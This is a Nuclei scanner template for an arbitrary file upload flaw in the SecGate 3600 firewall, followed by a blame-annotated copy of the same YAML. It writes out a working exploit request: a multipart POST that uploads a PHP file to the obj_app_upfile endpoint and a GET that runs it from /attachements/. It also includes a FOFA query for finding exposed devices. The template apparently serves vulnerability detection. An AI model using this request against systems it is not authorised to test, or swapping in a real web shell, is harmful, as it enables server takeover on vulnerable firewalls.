nuclei-templates/http/vulnerabilities/secworld/secgate-3600-file-upload.yaml

id: secgate-3600-file-upload

info:
  name: SecGate 3600 Firewall obj_app_upfile - Arbitrary File Upload
  author: SleepingBag945
  severity: critical
  description: |
    There is an arbitrary file upload vulnerability in the obj_app_upfile interface of Internet SecGate 3600 firewall. An attacker can obtain server permissions by constructing a special request package.
  reference:
    - https://peiqi.wgpsec.org/wiki/iot/%E5%A5%87%E5%AE%89%E4%BF%A1/%E7%BD%91%E7%A5%9E%20SecGate%203600%20%E9%98%B2%E7%81%AB%E5%A2%99%20obj_app_upfile%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E.html
    - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/iot/%E5%A5%87%E5%AE%89%E4%BF%A1/%E7%BD%91%E7%A5%9E%20SecGate%203600%20%E9%98%B2%E7%81%AB%E5%A2%99%20obj_app_upfile%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E.md
  metadata:
    verified: "true"
    max-request: 2
    fofa-query: fid="1Lh1LHi6yfkhiO83I59AYg=="
  tags: secgate,3600,firewall,file-upload,intrusive
variables:
  filename: "{{rand_base(6)}}"
  file-upload: "{{rand_base(5)}}"
  string: "secgate-3600-file-upload"

http:
  - raw:
      - |
        POST /?g=obj_app_upfile HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Accept-Encoding: gzip, deflate
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundary{{string}}
        User-Agent: Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.0; Trident/4.0)

        ------WebKitFormBoundary{{string}}
        Content-Disposition: form-data; name="MAX_FILE_SIZE"

        10000000
        ------WebKitFormBoundary{{string}}
        Content-Disposition: form-data; name="upfile"; filename="{{filename}}.php"
        Content-Type: text/plain

        <?php echo md5("{{string}}");unlink(__FILE__);?>

        ------WebKitFormBoundary{{string}}
        Content-Disposition: form-data; name="submit_post"

        obj_app_upfile
        ------WebKitFormBoundary{{string}}
        Content-Disposition: form-data; name="__hash__"

        0b9d6b1ab7479ab69d9f71b05e0e9445
        ------WebKitFormBoundary{{string}}--
      - |
        GET /attachements/{{filename}}.php HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '{{md5(string)}}'
# digest: 4a0a004730450220762f0a9de023ef72b212e2c26a9c5e6df64958bf09613b66ec7fa4b983612737022100a06761bdeacf0879ebe8ae8ea0d3ea2a7dae2f89b01fa38be843d2d706043af6:922c64590222798bb761d5b6d8e72950
Completed Assigned templates - DhiyaneshDK 2023-09-05 12:25:45 +00:00			`id: secgate-3600-file-upload`

			`info:`
			`name: SecGate 3600 Firewall obj_app_upfile - Arbitrary File Upload`
			`author: SleepingBag945`
			`severity: critical`
			`description: \|`
			`There is an arbitrary file upload vulnerability in the obj_app_upfile interface of Internet SecGate 3600 firewall. An attacker can obtain server permissions by constructing a special request package.`
			`reference:`
			`- https://peiqi.wgpsec.org/wiki/iot/%E5%A5%87%E5%AE%89%E4%BF%A1/%E7%BD%91%E7%A5%9E%20SecGate%203600%20%E9%98%B2%E7%81%AB%E5%A2%99%20obj_app_upfile%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E.html`
			`- https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/iot/%E5%A5%87%E5%AE%89%E4%BF%A1/%E7%BD%91%E7%A5%9E%20SecGate%203600%20%E9%98%B2%E7%81%AB%E5%A2%99%20obj_app_upfile%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E.md`
			`metadata:`
			`verified: "true"`
templateman update 2023-10-14 11:27:55 +00:00			`max-request: 2`
			`fofa-query: fid="1Lh1LHi6yfkhiO83I59AYg=="`
Completed Assigned templates - DhiyaneshDK 2023-09-05 12:25:45 +00:00			`tags: secgate,3600,firewall,file-upload,intrusive`
			`variables:`
			`filename: "{{rand_base(6)}}"`
			`file-upload: "{{rand_base(5)}}"`
updated php fileupload templates 2024-04-15 11:26:37 +00:00			`string: "secgate-3600-file-upload"`
Completed Assigned templates - DhiyaneshDK 2023-09-05 12:25:45 +00:00
			`http:`
			`- raw:`
			`- \|`
			`POST /?g=obj_app_upfile HTTP/1.1`
			`Host: {{Hostname}}`
			`Accept: /`
			`Accept-Encoding: gzip, deflate`
			`Content-Type: multipart/form-data; boundary=----WebKitFormBoundary{{string}}`
			`User-Agent: Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.0; Trident/4.0)`

			`------WebKitFormBoundary{{string}}`
			`Content-Disposition: form-data; name="MAX_FILE_SIZE"`

			`10000000`
			`------WebKitFormBoundary{{string}}`
			`Content-Disposition: form-data; name="upfile"; filename="{{filename}}.php"`
			`Content-Type: text/plain`

updated php fileupload templates 2024-04-15 11:26:37 +00:00			`<?php echo md5("{{string}}");unlink(__FILE__);?>`
Completed Assigned templates - DhiyaneshDK 2023-09-05 12:25:45 +00:00
			`------WebKitFormBoundary{{string}}`
			`Content-Disposition: form-data; name="submit_post"`

			`obj_app_upfile`
			`------WebKitFormBoundary{{string}}`
			`Content-Disposition: form-data; name="__hash__"`

			`0b9d6b1ab7479ab69d9f71b05e0e9445`
			`------WebKitFormBoundary{{string}}--`
			`- \|`
			`GET /attachements/{{filename}}.php HTTP/1.1`
			`Host: {{Hostname}}`

			`matchers-condition: and`
			`matchers:`
updated php fileupload templates 2024-04-15 11:26:37 +00:00			`- type: word`
			`part: body`
			`words:`
			`- '{{md5(string)}}'`
Auto Template Signing [Tue Apr 23 10:06:08 UTC 2024] :robot: 2024-04-23 10:06:08 +00:00			`# digest: 4a0a004730450220762f0a9de023ef72b212e2c26a9c5e6df64958bf09613b66ec7fa4b983612737022100a06761bdeacf0879ebe8ae8ea0d3ea2a7dae2f89b01fa38be843d2d706043af6:922c64590222798bb761d5b6d8e72950`